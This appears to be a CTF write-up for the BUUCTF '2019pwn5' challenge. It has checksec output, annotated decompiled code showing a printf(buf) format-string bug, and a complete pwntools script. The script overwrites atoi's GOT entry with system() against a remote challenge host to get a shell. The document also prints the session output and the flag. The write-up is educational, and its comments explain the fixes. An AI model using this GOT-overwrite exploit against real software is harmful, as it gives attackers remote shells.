q@ubuntu:~/buu/2019pwn5$ file pwn
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6a8aa744920dda62e84d44fcc440c05f31c4c23d, stripped
q@ubuntu:~/buu/2019pwn5$ checksec pwn
[*] '/home/q/buu/2019pwn5/pwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
/*
 * Decompiler-style pseudocode of the challenge binary's main(), as pasted in the
 * writeup. `result` and `v6` are used but never declared in this excerpt and
 * `a1` is unused; both are decompiler artifacts, not source. Flow: read 4 random
 * bytes into dword_804C044, read a "name" and echo it through printf(buf), read
 * a "passwd" and compare atoi(passwd) with the random value.
 */
int __cdecl main(int a1)
{
int fd; // [esp+0h] [ebp-84h]
char nptr[16]; // [esp+4h] [ebp-80h] BYREF -- receives the "passwd" input
char buf[100]; // [esp+14h] [ebp-70h] BYREF -- "name" input; sits at ebp-70h, so 0x70 bytes lie between it and the saved frame pointer
fd = open("/dev/urandom", 0); // return value is not checked for -1
read(fd, &dword_804C044, 4u); // 4 random bytes become the expected passwd; return value is not checked
printf("your name:");
read(0, buf, 0x63u);//0x63 (99) bytes into a 100-byte buffer, below 0x70: no stack overflow; note read() does not NUL-terminate and buf is not zeroed here
printf("Hello,");
printf(buf);//user input is passed as the format string (no "%s"): format-string bug; the fix is printf("%s", buf). Because checksec reports Partial RELRO, the GOT is writable, which is what the exploit script below relies on.
printf("your passwd:");
read(0, nptr, 0xFu); // 15 bytes into a 16-byte buffer; not NUL-terminated by read()
if ( atoi(nptr) == dword_804C044 ) // atoi() is called through its (writable) GOT entry
{
puts("ok!!");
system("/bin/sh");
}
else
{
puts("fail");
}
result = 0;
if ( __readgsdword(0x14u) != v6 ) // stack-canary check ("Canary found" in checksec)
sub_80493D0();
return result;
}
from pwn import *
# Exploit driver for the decompiled main() above. The binary hands the "name"
# input to printf() as its format string, and with Partial RELRO the GOT stays
# writable, so one format-string write can repoint a GOT entry. A printf("%s", buf)
# fix or Full RELRO (read-only GOT) would break this chain.
#io = process("./pwn")
# Remote challenge instance used in the writeup (a local process() is commented out above).
io = remote("node4.buuoj.cn",25068)
elf = ELF('./pwn')
atoi_got = elf.got['atoi']      # GOT slot that the later atoi(nptr) call resolves through
system_plt = elf.plt['system']  # PLT stub for system(), which the binary already links
# fmtstr_payload(offset, writes): 10 is the format-string argument offset at which
# the name buffer is found (a value the writeup established, not derivable from
# this snippet); the dict writes system_plt into atoi's GOT entry.
payload=fmtstr_payload(10,{atoi_got:system_plt})
io.sendline(payload)       # consumed by read(0, buf, 0x63) and then used by printf(buf)
io.sendline(b'/bin/sh\x00')  # consumed as nptr; atoi(nptr) now runs system("/bin/sh")
io.interactive()
[*] Switching to interactive mode
your name:Hello, X c \x00a7\xc04\xc05\xc0
\x8d\xeyour passwd:$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
flag{c6848333-4abb-41a7-b138-01a2448b67e4}